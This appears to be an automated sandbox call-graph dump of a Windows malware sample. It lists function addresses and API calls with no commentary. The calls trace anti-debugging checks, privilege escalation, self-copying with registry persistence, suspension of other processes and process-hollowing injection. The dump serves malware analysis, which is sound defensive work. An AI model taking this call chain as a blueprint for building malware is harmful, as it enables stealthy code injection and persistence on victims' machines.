19258->19260 19264 7ff795d3ad44 19260->19264 19263 7ff795d33e20 _getptd 67 API calls 19263->19259 19265 7ff795d3ad7a 19264->19265 19266 7ff795d3ad61 19264->19266 19267 7ff795d3ac9b 19265->19267 19285 7ff795d34254 19265->19285 19268 7ff795d33840 _FF_MSGBANNER 66 API calls 19266->19268 19267->19259 19267->19263 19270 7ff795d3ad66 19268->19270 19271 7ff795d338b4 _NMSG_WRITE 66 API calls 19270->19271 19273 7ff795d3ad70 19271->19273 19276 7ff795d33e08 _mtinitlocknum 3 API calls 19273->19276 19274 7ff795d3ada4 19277 7ff795d359a4 _errno 66 API calls 19274->19277 19275 7ff795d3adb3 19278 7ff795d3ac78 _lock 66 API calls 19275->19278 19276->19265 19277->19267 19279 7ff795d3adbd 19278->19279 19280 7ff795d3add9 19279->19280 19281 7ff795d3adc8 InitializeCriticalSectionAndSpinCount 19279->19281 19282 7ff795d3240c free 66 API calls 19280->19282 19283 7ff795d3addf LeaveCriticalSection 19281->19283 19284 7ff795d3adde 19282->19284 19283->19267 19284->19283 19286 7ff795d3427c 19285->19286 19288 7ff795d342b1 19286->19288 19289 7ff795d34290 Sleep 19286->19289 19290 7ff795d3244c 19286->19290 19288->19274 19288->19275 19289->19286 19289->19288 19291 7ff795d324e0 19290->19291 19302 7ff795d32464 19290->19302 19292 7ff795d33d88 _callnewh DecodePointer 19291->19292 19293 7ff795d324e5 19292->19293 19295 7ff795d359a4 _errno 67 API calls 19293->19295 19294 7ff795d3249c HeapAlloc 19296 7ff795d324d5 19294->19296 19294->19302 19295->19296 19296->19286 19297 7ff795d33840 _FF_MSGBANNER 67 API calls 19297->19302 19298 7ff795d324c5 19301 7ff795d359a4 _errno 67 API calls 19298->19301 19299 7ff795d338b4 _NMSG_WRITE 67 API calls 19299->19302 19300 7ff795d33d88 _callnewh DecodePointer 19300->19302 19303 7ff795d324ca 19301->19303 19302->19294 19302->19297 19302->19298 19302->19299 19302->19300 19302->19303 19304 7ff795d33e08 _mtinitlocknum 3 API calls 19302->19304 19305 7ff795d359a4 _errno 67 API calls 19303->19305 19304->19302 19305->19296 19307 7ff795d3a35a 19306->19307 19308 7ff795d3a364 19306->19308 19307->19308 19313 7ff795d3a381 19307->19313 19309 7ff795d359a4 _errno 68 API calls 19308->19309 19310 7ff795d3a36d 19309->19310 19320 7ff795d347a0 19310->19320 19312 7ff795d3a379 19312->19095 19313->19312 19314 7ff795d359a4 _errno 68 API calls 19313->19314 19314->19310 19316 7ff795d347ce 19315->19316 19329 7ff795d3463c 19316->19329 19323 7ff795d34738 DecodePointer 19320->19323 19324 7ff795d34776 19323->19324 19325 7ff795d347c0 _invoke_watson 15 API calls 19324->19325 19326 7ff795d3479c 19325->19326 19327 7ff795d34738 _invalid_parameter_noinfo 15 API calls 19326->19327 19328 7ff795d347b9 19327->19328 19328->19312 19330 7ff795d34677 _call_reportfault _cftof2_l 19329->19330 19337 7ff795d3a094 RtlCaptureContext RtlLookupFunctionEntry 19330->19337 19338 7ff795d346af IsDebuggerPresent 19337->19338 19339 7ff795d3a0c4 RtlVirtualUnwind 19337->19339 19340 7ff795d3a24c SetUnhandledExceptionFilter UnhandledExceptionFilter 19338->19340 19339->19338 19342 7ff795d3af63 EncodePointer 19341->19342 19342->19342 19343 7ff795d3af7e 19342->19343 19343->19102 19347 7ff795d31684 19344->19347 19360 7ff795d33fdc 19347->19360 19664 7ff795d2df78 LoadLibraryA GetProcAddress 19361->19664 19363 7ff795d2e073 19665 7ff795d2df78 LoadLibraryA GetProcAddress 19363->19665 19365 7ff795d2e08d 19666 7ff795d2dfbc LoadLibraryA GetProcAddress 19365->19666 19367 7ff795d2e0a7 19667 7ff795d2dfbc LoadLibraryA GetProcAddress 19367->19667 19369 7ff795d2e0c1 19668 7ff795d2dfbc LoadLibraryA GetProcAddress 19369->19668 19371 7ff795d2e0db 19669 7ff795d2dfbc LoadLibraryA GetProcAddress 19371->19669 19373 7ff795d2e0f5 19670 7ff795d2dfbc LoadLibraryA GetProcAddress 19373->19670 19375 7ff795d2e10f 19671 7ff795d2dfbc LoadLibraryA GetProcAddress 19375->19671 19377 7ff795d2e129 19672 7ff795d2dfbc LoadLibraryA GetProcAddress 19377->19672 19379 7ff795d2e143 19673 7ff795d2dfbc LoadLibraryA GetProcAddress 19379->19673 19381 7ff795d2e15d 19674 7ff795d2dfbc LoadLibraryA GetProcAddress 19381->19674 19383 7ff795d2e177 19675 7ff795d2df78 LoadLibraryA GetProcAddress 19383->19675 19385 7ff795d2e191 19676 7ff795d2df78 LoadLibraryA GetProcAddress 19385->19676 19387 7ff795d2e1ab 19677 7ff795d2df78 LoadLibraryA GetProcAddress 19387->19677 19389 7ff795d2e1c5 19678 7ff795d2df78 LoadLibraryA GetProcAddress 19389->19678 19391 7ff795d2e1df 19679 7ff795d2dfbc LoadLibraryA GetProcAddress 19391->19679 19393 7ff795d2e1f9 19680 7ff795d2dfbc LoadLibraryA GetProcAddress 19393->19680 19395 7ff795d2e213 19681 7ff795d2dfbc LoadLibraryA GetProcAddress 19395->19681 19397 7ff795d2e22d 19682 7ff795d2dfbc LoadLibraryA GetProcAddress 19397->19682 19399 7ff795d2e247 19683 7ff795d2dfbc LoadLibraryA GetProcAddress 19399->19683 19401 7ff795d2e261 19684 7ff795d2dfbc LoadLibraryA GetProcAddress 19401->19684 19403 7ff795d2e27b 19685 7ff795d2dfbc LoadLibraryA GetProcAddress 19403->19685 19405 7ff795d2e295 19686 7ff795d2dfbc LoadLibraryA GetProcAddress 19405->19686 19407 7ff795d2e2af 19687 7ff795d2dfbc LoadLibraryA GetProcAddress 19407->19687 19409 7ff795d2e2c9 19688 7ff795d2dfbc LoadLibraryA GetProcAddress 19409->19688 19411 7ff795d2e2e3 19689 7ff795d2dfbc LoadLibraryA GetProcAddress 19411->19689 19413 7ff795d2e2fd 19690 7ff795d2dfbc LoadLibraryA GetProcAddress 19413->19690 19415 7ff795d2e317 19691 7ff795d2dfbc LoadLibraryA GetProcAddress 19415->19691 19417 7ff795d2e331 19692 7ff795d2dfbc LoadLibraryA GetProcAddress 19417->19692 19419 7ff795d2e34b 19693 7ff795d2dfbc LoadLibraryA GetProcAddress 19419->19693 19421 7ff795d2e365 19694 7ff795d2dfbc LoadLibraryA GetProcAddress 19421->19694 19423 7ff795d2e37f 19695 7ff795d2dfbc LoadLibraryA GetProcAddress 19423->19695 19425 7ff795d2e399 19696 7ff795d2dfbc LoadLibraryA GetProcAddress 19425->19696 19427 7ff795d2e3b3 19697 7ff795d2dfbc LoadLibraryA GetProcAddress 19427->19697 19429 7ff795d2e3cd 19698 7ff795d2dfbc LoadLibraryA GetProcAddress 19429->19698 19431 7ff795d2e3e7 19699 7ff795d2dfbc LoadLibraryA GetProcAddress 19431->19699 19433 7ff795d2e401 19700 7ff795d2dfbc LoadLibraryA GetProcAddress 19433->19700 19435 7ff795d2e41b 19701 7ff795d2dfbc LoadLibraryA GetProcAddress 19435->19701 19437 7ff795d2e435 19702 7ff795d2dfbc LoadLibraryA GetProcAddress 19437->19702 19439 7ff795d2e44f 19703 7ff795d2dfbc LoadLibraryA GetProcAddress 19439->19703 19441 7ff795d2e469 19704 7ff795d2dfbc LoadLibraryA GetProcAddress 19441->19704 19443 7ff795d2e483 19705 7ff795d2dfbc LoadLibraryA GetProcAddress 19443->19705 19445 7ff795d2e49d 19706 7ff795d2dfbc LoadLibraryA GetProcAddress 19445->19706 19447 7ff795d2e4b7 19707 7ff795d2dfbc LoadLibraryA GetProcAddress 19447->19707 19449 7ff795d2e4d1 19708 7ff795d2dfbc LoadLibraryA GetProcAddress 19449->19708 19451 7ff795d2e4eb 19709 7ff795d2dfbc LoadLibraryA GetProcAddress 19451->19709 19453 7ff795d2e505 19710 7ff795d2dfbc LoadLibraryA GetProcAddress 19453->19710 19455 7ff795d2e51f 19711 7ff795d2dfbc LoadLibraryA GetProcAddress 19455->19711 19457 7ff795d2e539 19712 7ff795d2dfbc LoadLibraryA GetProcAddress 19457->19712 19459 7ff795d2e553 19713 7ff795d2dfbc LoadLibraryA GetProcAddress 19459->19713 19461 7ff795d2e56d 19714 7ff795d2dfbc LoadLibraryA GetProcAddress 19461->19714 19463 7ff795d2e587 19715 7ff795d2dfbc LoadLibraryA GetProcAddress 19463->19715 19465 7ff795d2e5a1 19716 7ff795d2dfbc LoadLibraryA GetProcAddress 19465->19716 19467 7ff795d2e5bb 19717 7ff795d2dfbc LoadLibraryA GetProcAddress 19467->19717 19469 7ff795d2e5d5 19718 7ff795d2dfbc LoadLibraryA GetProcAddress 19469->19718 19471 7ff795d2e5ef 19719 7ff795d2dfbc LoadLibraryA GetProcAddress 19471->19719 19473 7ff795d2e609 19720 7ff795d2dfbc LoadLibraryA GetProcAddress 19473->19720 19475 7ff795d2e623 19721 7ff795d2dfbc LoadLibraryA GetProcAddress 19475->19721 19477 7ff795d2e63d 19722 7ff795d2dfbc LoadLibraryA GetProcAddress 19477->19722 19479 7ff795d2e657 19723 7ff795d2dfbc LoadLibraryA GetProcAddress 19479->19723 19481 7ff795d2e671 19724 7ff795d2dfbc LoadLibraryA GetProcAddress 19481->19724 19483 7ff795d2e68b 19725 7ff795d2dfbc LoadLibraryA GetProcAddress 19483->19725 19485 7ff795d2e6a5 19726 7ff795d2dfbc LoadLibraryA GetProcAddress 19485->19726 19487 7ff795d2e6bf 19727 7ff795d2dfbc LoadLibraryA GetProcAddress 19487->19727 19489 7ff795d2e6d9 19728 7ff795d2dfbc LoadLibraryA GetProcAddress 19489->19728 19491 7ff795d2e6f3 19729 7ff795d2dfbc LoadLibraryA GetProcAddress 19491->19729 19493 7ff795d2e70d 19730 7ff795d2dfbc LoadLibraryA GetProcAddress 19493->19730 19495 7ff795d2e727 19731 7ff795d2dfbc LoadLibraryA GetProcAddress 19495->19731 19497 7ff795d2e741 19732 7ff795d2dfbc LoadLibraryA GetProcAddress 19497->19732 19499 7ff795d2e75b 19733 7ff795d2dfbc LoadLibraryA GetProcAddress 19499->19733 19501 7ff795d2e775 19734 7ff795d2dfbc LoadLibraryA GetProcAddress 19501->19734 19503 7ff795d2e78f 19735 7ff795d2dfbc LoadLibraryA GetProcAddress 19503->19735 19505 7ff795d2e7a9 19736 7ff795d2dfbc LoadLibraryA GetProcAddress 19505->19736 19507 7ff795d2e7c3 19737 7ff795d2dfbc LoadLibraryA GetProcAddress 19507->19737 19509 7ff795d2e7dd 19738 7ff795d2dfbc LoadLibraryA GetProcAddress 19509->19738 19511 7ff795d2e7f7 19739 7ff795d2dfbc LoadLibraryA GetProcAddress 19511->19739 19513 7ff795d2e811 19740 7ff795d2dfbc LoadLibraryA GetProcAddress 19513->19740 19515 7ff795d2e82b 19741 7ff795d2dfbc LoadLibraryA GetProcAddress 19515->19741 19517 7ff795d2e845 19742 7ff795d2dfbc LoadLibraryA GetProcAddress 19517->19742 19519 7ff795d2e85f 19743 7ff795d2dfbc LoadLibraryA GetProcAddress 19519->19743 19521 7ff795d2e879 19744 7ff795d2dfbc LoadLibraryA GetProcAddress 19521->19744 19523 7ff795d2e893 19745 7ff795d2dfbc LoadLibraryA GetProcAddress 19523->19745 19525 7ff795d2e8ad 19746 7ff795d2dfbc LoadLibraryA GetProcAddress 19525->19746 19527 7ff795d2e8c7 19747 7ff795d2dfbc LoadLibraryA GetProcAddress 19527->19747 19529 7ff795d2e8e1 19748 7ff795d2dfbc LoadLibraryA GetProcAddress 19529->19748 19531 7ff795d2e8fb 19749 7ff795d2dfbc LoadLibraryA GetProcAddress 19531->19749 19533 7ff795d2e915 19750 7ff795d2dfbc LoadLibraryA GetProcAddress 19533->19750 19535 7ff795d2e92f 19751 7ff795d2dfbc LoadLibraryA GetProcAddress 19535->19751 19537 7ff795d2e949 19752 7ff795d2dfbc LoadLibraryA GetProcAddress 19537->19752 19539 7ff795d2e963 19753 7ff795d2dfbc LoadLibraryA GetProcAddress 19539->19753 19541 7ff795d2e97d 19754 7ff795d2dfbc LoadLibraryA GetProcAddress 19541->19754 19543 7ff795d2e997 19755 7ff795d2dfbc LoadLibraryA GetProcAddress 19543->19755 19545 7ff795d2e9b1 19756 7ff795d2dfbc LoadLibraryA GetProcAddress 19545->19756 19547 7ff795d2e9cb 19757 7ff795d2dfbc LoadLibraryA GetProcAddress 19547->19757 19549 7ff795d2e9e5 19758 7ff795d2dfbc LoadLibraryA GetProcAddress 19549->19758 19551 7ff795d2e9ff 19759 7ff795d2dfbc LoadLibraryA GetProcAddress 19551->19759 19553 7ff795d2ea19 19760 7ff795d2dfbc LoadLibraryA GetProcAddress 19553->19760 19555 7ff795d2ea33 19761 7ff795d2dfbc LoadLibraryA GetProcAddress 19555->19761 19557 7ff795d2ea4d 19762 7ff795d2dfbc LoadLibraryA GetProcAddress 19557->19762 19559 7ff795d2ea67 19763 7ff795d2df78 LoadLibraryA GetProcAddress 19559->19763 19561 7ff795d2ea81 19764 7ff795d2dfbc LoadLibraryA GetProcAddress 19561->19764 19563 7ff795d2ea9b 19765 7ff795d2dfbc LoadLibraryA GetProcAddress 19563->19765 19565 7ff795d2eab5 19766 7ff795d2dfbc LoadLibraryA GetProcAddress 19565->19766 19567 7ff795d2eacf 19767 7ff795d2dfbc LoadLibraryA GetProcAddress 19567->19767 19569 7ff795d2eae9 19768 7ff795d2dfbc LoadLibraryA GetProcAddress 19569->19768 19571 7ff795d2eb03 19769 7ff795d2dfbc LoadLibraryA GetProcAddress 19571->19769 19573 7ff795d2eb1d 19770 7ff795d2dfbc LoadLibraryA GetProcAddress 19573->19770 19575 7ff795d2eb37 19771 7ff795d2df78 LoadLibraryA GetProcAddress 19575->19771 19577 7ff795d2eb51 19772 7ff795d2df78 LoadLibraryA GetProcAddress 19577->19772 19579 7ff795d2eb6b 19773 7ff795d2dfbc LoadLibraryA GetProcAddress 19579->19773 19581 7ff795d2eb85 19774 7ff795d2dfbc LoadLibraryA GetProcAddress 19581->19774 19583 7ff795d2eb9f 19775 7ff795d2dfbc LoadLibraryA GetProcAddress 19583->19775 19585 7ff795d2ebb9 19776 7ff795d2dfbc LoadLibraryA GetProcAddress 19585->19776 19587 7ff795d2ebd3 19777 7ff795d2dfbc LoadLibraryA GetProcAddress 19587->19777 19589 7ff795d2ebed 19778 7ff795d2dfbc LoadLibraryA GetProcAddress 19589->19778 19591 7ff795d2ec07 19592 7ff795d30150 IsDebuggerPresent 19591->19592 19593 7ff795d30162 GetCurrentProcess CheckRemoteDebuggerPresent 19592->19593 19594 7ff795d2fbc5 19592->19594 19593->19594 19594->19110 19594->19111 19596 7ff795d30632 GetTokenInformation 19595->19596 19597 7ff795d2fbd9 19595->19597 19779 7ff795d302b0 VirtualAlloc 19596->19779 19606 7ff795d303f4 GetModuleFileNameW 19597->19606 19599 7ff795d30663 GetTokenInformation 19600 7ff795d306aa AdjustTokenPrivileges CloseHandle 19599->19600 19601 7ff795d30690 CloseHandle 19599->19601 19780 7ff795d30280 19600->19780 19602 7ff795d30280 VirtualFree 19601->19602 19603 7ff795d306a5 19602->19603 19603->19597 19607 7ff795d304b8 wcsncpy 19606->19607 19608 7ff795d3041f PathFindFileNameW wcslen 19606->19608 19609 7ff795d3044d 19607->19609 19608->19609 19609->19115 19611 7ff795d3076c GetLastError 19610->19611 19613 7ff795d2fc14 19610->19613 19612 7ff795d30779 CloseHandle 19611->19612 19611->19613 19612->19613 19613->19122 19613->19123 19783 7ff795d30844 19614->19783 19616 7ff795d301b8 19786 7ff795d31010 CreateFileW 19616->19786 19619 7ff795d301f7 19620 7ff795d301fe Sleep 19619->19620 19621 7ff795d3020b 19619->19621 19620->19619 19621->19127 19623 7ff795d31174 3 API calls 19622->19623 19624 7ff795d307c3 19623->19624 19625 7ff795d30844 11 API calls 19624->19625 19626 7ff795d307cd GetModuleFileNameW DeleteFileW CopyFileW 19625->19626 19627 7ff795d2fce6 19626->19627 19628 7ff795d3080f SetFileAttributesW 19626->19628 19630 7ff795d30218 GetVersionExW 19627->19630 19803 7ff795d30f48 RegOpenKeyExW 19628->19803 19631 7ff795d2fcef 19630->19631 19631->19128 19631->19129 19807 7ff795d12314 LoadLibraryA 19632->19807 19637 7ff795d1352f GetModuleFileNameW 19822 7ff795d122bc 19637->19822 19638 7ff795d13525 ExitProcess 19641 7ff795d135ba CreateFileW 19643 7ff795d1366b 19641->19643 19642 7ff795d135f6 19858 7ff795d13aa8 19642->19858 19826 7ff795d12058 CreateFileMappingW 19643->19826 19646 7ff795d13610 19863 7ff795d13cd4 19646->19863 19650 7ff795d136e7 19655 7ff795d12f38 6 API calls 19650->19655 19651 7ff795d136a9 CloseHandle 19833 7ff795d12d60 GetTempPathW GetTempFileNameW 19651->19833 19658 7ff795d136f6 CloseHandle 19655->19658 19660 7ff795d136e0 19658->19660 19845 7ff795d12fdc 19660->19845 19664->19363 19665->19365 19666->19367 19667->19369 19668->19371 19669->19373 19670->19375 19671->19377 19672->19379 19673->19381 19674->19383 19675->19385 19676->19387 19677->19389 19678->19391 19679->19393 19680->19395 19681->19397 19682->19399 19683->19401 19684->19403 19685->19405 19686->19407 19687->19409 19688->19411 19689->19413 19690->19415 19691->19417 19692->19419 19693->19421 19694->19423 19695->19425 19696->19427 19697->19429 19698->19431 19699->19433 19700->19435 19701->19437 19702->19439 19703->19441 19704->19443 19705->19445 19706->19447 19707->19449 19708->19451 19709->19453 19710->19455 19711->19457 19712->19459 19713->19461 19714->19463 19715->19465 19716->19467 19717->19469 19718->19471 19719->19473 19720->19475 19721->19477 19722->19479 19723->19481 19724->19483 19725->19485 19726->19487 19727->19489 19728->19491 19729->19493 19730->19495 19731->19497 19732->19499 19733->19501 19734->19503 19735->19505 19736->19507 19737->19509 19738->19511 19739->19513 19740->19515 19741->19517 19742->19519 19743->19521 19744->19523 19745->19525 19746->19527 19747->19529 19748->19531 19749->19533 19750->19535 19751->19537 19752->19539 19753->19541 19754->19543 19755->19545 19756->19547 19757->19549 19758->19551 19759->19553 19760->19555 19761->19557 19762->19559 19763->19561 19764->19563 19765->19565 19766->19567 19767->19569 19768->19571 19769->19573 19770->19575 19771->19577 19772->19579 19773->19581 19774->19583 19775->19585 19776->19587 19777->19589 19778->19591 19779->19599 19781 7ff795d30291 VirtualFree 19780->19781 19782 7ff795d302a4 19780->19782 19781->19782 19782->19597 19792 7ff795d31174 GetWindowsDirectoryW 19783->19792 19785 7ff795d30873 8 API calls 19785->19616 19787 7ff795d31087 GetLastError 19786->19787 19788 7ff795d31066 19786->19788 19790 7ff795d301cb CreateThread 19787->19790 19797 7ff795d31394 GetFileSize 19788->19797 19790->19619 19793 7ff795d311c8 GetVolumeInformationW 19792->19793 19794 7ff795d311b5 19792->19794 19796 7ff795d3125c 19793->19796 19794->19793 19795 7ff795d312ae wsprintfW 19795->19785 19796->19795 19802 7ff795d302b0 VirtualAlloc 19797->19802 19799 7ff795d313c0 19800 7ff795d31075 CloseHandle 19799->19800 19801 7ff795d313d4 SetFilePointer ReadFile 19799->19801 19800->19790 19801->19800 19802->19799 19804 7ff795d30f88 19803->19804 19805 7ff795d30f8c RegSetValueExW RegCloseKey 19803->19805 19804->19627 19805->19804 19808 7ff795d12337 9 API calls 19807->19808 19809 7ff795d12332 19807->19809 19810 7ff795d12472 FreeLibrary 19808->19810 19811 7ff795d12422 19808->19811 19812 7ff795d11478 LoadLibraryA 19809->19812 19810->19809 19811->19809 19811->19810 19813 7ff795d1149d GetProcAddress 19812->19813 19814 7ff795d11496 19812->19814 19815 7ff795d114c3 GetProcAddress 19813->19815 19816 7ff795d114bc 19813->19816 19814->19637 19814->19638 19815->19816 19817 7ff795d114f5 GetProcAddress 19815->19817 19816->19814 19817->19816 19818 7ff795d11527 GetProcAddress 19817->19818 19818->19816 19819 7ff795d11559 GetProcAddress 19818->19819 19819->19816 19820 7ff795d11588 GetProcAddress 19819->19820 19820->19816 19821 7ff795d115b7 GetProcAddress 19820->19821 19821->19816 19823 7ff795d122d7 ExpandEnvironmentStringsW 19822->19823 19824 7ff795d122f0 ExpandEnvironmentStringsW 19822->19824 19825 7ff795d12307 19823->19825 19824->19825 19825->19641 19825->19642 19827 7ff795d1209c CloseHandle 19826->19827 19828 7ff795d120ae MapViewOfFile 19826->19828 19829 7ff795d12134 19827->19829 19830 7ff795d120da CloseHandle CloseHandle 19828->19830 19831 7ff795d120f4 GetFileSize VirtualAlloc 19828->19831 19829->19638 19829->19650 19829->19651 19830->19829 19831->19829 19832 7ff795d12138 UnmapViewOfFile CloseHandle 19831->19832 19832->19829 19893 7ff795d12bec 19833->19893 19835 7ff795d12e08 19836 7ff795d12e29 NtSetInformationFile 19835->19836 19839 7ff795d12e1d 19835->19839 19837 7ff795d12e9f NtWriteFile 19836->19837 19836->19839 19838 7ff795d12f0b GetLastError 19837->19838 19837->19839 19838->19839 19840 7ff795d12f38 NtCreateSection 19839->19840 19841 7ff795d12f9b 19840->19841 19844 7ff795d12f92 19840->19844 19987 7ff795d11e8c GetFileSize SetFilePointer 19841->19987 19844->19660 19846 7ff795d1302e wcsnlen 19845->19846 19991 7ff795d12a40 19846->19991 19849 7ff795d13084 19855 7ff795d12174 19849->19855 19851 7ff795d130a7 19851->19849 19998 7ff795d11f38 19851->19998 19854 7ff795d1310d ResumeThread 19854->19849 19856 7ff795d1218a 19855->19856 19857 7ff795d1218c VirtualFree 19855->19857 19856->19638 19857->19856 20018 7ff795d13c0c 19858->20018 19862 7ff795d13adc 19862->19646 19864 7ff795d13ce8 19863->19864 19865 7ff795d1361d OpenProcess 19863->19865 20042 7ff795d13e14 19864->20042 19867 7ff795d11b30 NtSuspendProcess 19865->19867 19868 7ff795d11bb7 19867->19868 19869 7ff795d11b94 NtResumeProcess CloseHandle 19867->19869 20057 7ff795d133f8 19868->20057 19875 7ff795d11e54 19869->19875 19872 7ff795d11bc0 NtResumeProcess CloseHandle 19872->19875 19873 7ff795d11e60 19874 7ff795d11e67 CloseHandle 19873->19874 19873->19875 19874->19875 19890 7ff795d13bcc 19875->19890 19876 7ff795d11be3 19876->19873 19877 7ff795d11c26 GetCurrentProcess DuplicateHandle 19876->19877 19877->19876 19878 7ff795d11c78 CreateThread 19877->19878 19879 7ff795d11ce1 WaitForSingleObject 19878->19879 19880 7ff795d11cd1 CloseHandle 19878->19880 19881 7ff795d11d20 CloseHandle GetExitCodeThread 19879->19881 19882 7ff795d11cf5 TerminateThread CloseHandle CloseHandle 19879->19882 19880->19876 19883 7ff795d11d52 CloseHandle 19881->19883 19884 7ff795d11d42 CloseHandle 19881->19884 19882->19881 19885 7ff795d11d6f strrchr 19883->19885 19884->19883 20065 7ff795d31d88 19885->20065 19887 7ff795d11da0 GetCurrentProcess DuplicateHandle 19887->19875 19889 7ff795d11e08 GetCurrentProcess DuplicateHandle 19887->19889 19889->19875 20370 7ff795d14368 19890->20370 19900 7ff795d13970 19893->19900 19897 7ff795d12c22 19898 7ff795d12c47 RtlInitUnicodeString NtOpenFile 19897->19898 19899 7ff795d12d17 19898->19899 19899->19835 19901 7ff795d13988 construct shared_ptr type_info::_name_internal_method 19900->19901 19907 7ff795d14e20 19901->19907 19904 7ff795d13d10 19966 7ff795d14a18 19904->19966 19908 7ff795d14e38 type_info::_name_internal_method 19907->19908 19911 7ff795d14e50 19908->19911 19910 7ff795d12c0d 19910->19904 19912 7ff795d14e72 type_info::_name_internal_method 19911->19912 19913 7ff795d14e79 type_info::_name_internal_method 19912->19913 19914 7ff795d14eaa 19912->19914 19918 7ff795d14d1c 19913->19918 19929 7ff795d1447c 19914->19929 19917 7ff795d14ea8 type_info::_name_internal_method char_traits 19917->19910 19919 7ff795d14d3e type_info::_name_internal_method 19918->19919 19921 7ff795d14d4f type_info::_name_internal_method 19919->19921 19935 7ff795d1485c 19919->19935 19922 7ff795d14db5 19921->19922 19923 7ff795d14d85 19921->19923 19924 7ff795d1447c type_info::_name_internal_method 70 API calls 19922->19924 19938 7ff795d15330 19923->19938 19928 7ff795d14db3 type_info::_name_internal_method char_traits 19924->19928 19926 7ff795d14da2 19942 7ff795d1525c 19926->19942 19928->19917 19930 7ff795d14499 type_info::_name_internal_method 19929->19930 19931 7ff795d144aa 19930->19931 19951 7ff795d14840 19930->19951 19934 7ff795d144d2 type_info::_name_internal_method 19931->19934 19954 7ff795d1409c 19931->19954 19934->19917 19946 7ff795d404f8 19935->19946 19939 7ff795d1534e 19938->19939 19941 7ff795d15358 type_info::_name_internal_method 19938->19941 19940 7ff795d1485c _Mtx_guard::~_Mtx_guard 70 API calls 19939->19940 19940->19941 19941->19926 19943 7ff795d1527f 19942->19943 19945 7ff795d15289 type_info::_name_internal_method char_traits 19942->19945 19944 7ff795d1485c _Mtx_guard::~_Mtx_guard 70 API calls 19943->19944 19944->19945 19945->19928 19947 7ff795d32eb4 std::exception::exception 68 API calls 19946->19947 19948 7ff795d40510 19947->19948 19949 7ff795d32504 _CxxThrowException RtlPcToFileHeader RaiseException 19948->19949 19950 7ff795d4052d 19949->19950 19958 7ff795d404c0 19951->19958 19955 7ff795d140d6 _Ucopy type_info::_name_internal_method 19954->19955 19963 7ff795d1489c 19955->19963 19957 7ff795d141d0 construct _Ucopy type_info::_name_internal_method char_traits 19957->19934 19959 7ff795d32eb4 std::exception::exception 68 API calls 19958->19959 19960 7ff795d404d8 19959->19960 19961 7ff795d32504 _CxxThrowException RtlPcToFileHeader RaiseException 19960->19961 19962 7ff795d404f5 19961->19962 19964 7ff795d148e0 _DebugMallocator 70 API calls 19963->19964 19965 7ff795d148b9 19964->19965 19965->19957 19967 7ff795d14a30 type_info::_name_internal_method 19966->19967 19970 7ff795d14a48 19967->19970 19969 7ff795d13d2d 19969->19897 19971 7ff795d14a6a type_info::_name_internal_method 19970->19971 19972 7ff795d14a71 type_info::_name_internal_method 19971->19972 19973 7ff795d14aa5 19971->19973 19979 7ff795d14900 19972->19979 19974 7ff795d14acc 19973->19974 19975 7ff795d14840 _Mtx_guard::~_Mtx_guard 70 API calls 19973->19975 19976 7ff795d1447c type_info::_name_internal_method 70 API calls 19974->19976 19978 7ff795d14aa0 type_info::_name_internal_method char_traits 19974->19978 19975->19974 19976->19978 19978->19969 19980 7ff795d14922 type_info::_name_internal_method 19979->19980 19981 7ff795d1485c _Mtx_guard::~_Mtx_guard 70 API calls 19980->19981 19982 7ff795d14933 type_info::_name_internal_method 19980->19982 19981->19982 19983 7ff795d14984 19982->19983 19984 7ff795d14840 _Mtx_guard::~_Mtx_guard 70 API calls 19982->19984 19985 7ff795d149b1 type_info::_name_internal_method char_traits 19983->19985 19986 7ff795d1447c type_info::_name_internal_method 70 API calls 19983->19986 19984->19983 19985->19978 19986->19985 19988 7ff795d11ed7 19987->19988 19989 7ff795d11f2d NtClose 19988->19989 19990 7ff795d11ee1 WriteFile SetFilePointer 19988->19990 19989->19844 19990->19988 20006 7ff795d11600 GetModuleHandleA GetProcAddress 19991->20006 19994 7ff795d12a67 lstrcatW CreateProcessInternalW 19995 7ff795d12a60 19994->19995 19995->19849 19996 7ff795d12b44 NtMapViewOfSection 19995->19996 19997 7ff795d12bc9 19996->19997 19997->19851 19999 7ff795d11f5d 19998->19999 20008 7ff795d12838 19999->20008 20003 7ff795d11fb1 20004 7ff795d12001 WriteProcessMemory 20003->20004 20005 7ff795d11f96 20003->20005 20004->20005 20005->19849 20005->19854 20007 7ff795d11639 20006->20007 20007->19994 20007->19995 20009 7ff795d128d9 GetThreadContext 20008->20009 20010 7ff795d1285b Wow64GetThreadContext 20008->20010 20011 7ff795d11f92 20009->20011 20013 7ff795d1293a SetThreadContext 20009->20013 20010->20011 20012 7ff795d128af Wow64SetThreadContext 20010->20012 20011->20005 20014 7ff795d12974 20011->20014 20012->20011 20013->20011 20015 7ff795d12991 Wow64GetThreadContext 20014->20015 20016 7ff795d129d2 GetThreadContext 20014->20016 20017 7ff795d129c5 20015->20017 20016->20017 20017->20003 20023 7ff795d31590 20018->20023 20020 7ff795d13ac0 20020->19862 20021 7ff795d139c0 SysAllocString 20020->20021 20022 7ff795d13a05 20021->20022 20022->19862 20025 7ff795d3159b 20023->20025 20024 7ff795d3244c malloc 68 API calls 20024->20025 20025->20024 20026 7ff795d315b4 20025->20026 20027 7ff795d33d88 _callnewh DecodePointer 20025->20027 20028 7ff795d315ba std::_Xbad_alloc 20025->20028 20026->20020 20027->20025 20033 7ff795d32504 20028->20033 20030 7ff795d315f8 20038 7ff795d32f2c 20030->20038 20032 7ff795d3161a 20032->20020 20034 7ff795d32584 RtlPcToFileHeader 20033->20034 20035 7ff795d32574 20033->20035 20036 7ff795d325a9 20034->20036 20037 7ff795d325c4 RaiseException 20034->20037 20035->20034 20036->20037 20037->20030 20039 7ff795d33018 20038->20039 20040 7ff795d33030 20039->20040 20041 7ff795d3240c free 68 API calls 20039->20041 20040->20032 20041->20040 20043 7ff795d13e29 20042->20043 20045 7ff795d13e36 20042->20045 20046 7ff795d400b0 20043->20046 20045->19865 20047 7ff795d400e2 WideCharToMultiByte 20046->20047 20053 7ff795d400db 20046->20053 20049 7ff795d4012a GetLastError 20047->20049 20050 7ff795d40134 20047->20050 20049->20050 20051 7ff795d31590 _Allocate 70 API calls 20050->20051 20052 7ff795d4014c 20051->20052 20052->20053 20054 7ff795d40154 WideCharToMultiByte 20052->20054 20053->20045 20054->20053 20055 7ff795d4017d 20054->20055 20056 7ff795d40185 GetLastError 20055->20056 20056->20053 20058 7ff795d13427 20057->20058 20059 7ff795d13433 20057->20059 20060 7ff795d3240c free 68 API calls 20058->20060 20061 7ff795d1347c NtQuerySystemInformation 20059->20061 20062 7ff795d3244c malloc 68 API calls 20059->20062 20063 7ff795d11bbc 20059->20063 20064 7ff795d3240c 68 API calls free 20059->20064 20060->20059 20061->20059 20061->20063 20062->20059 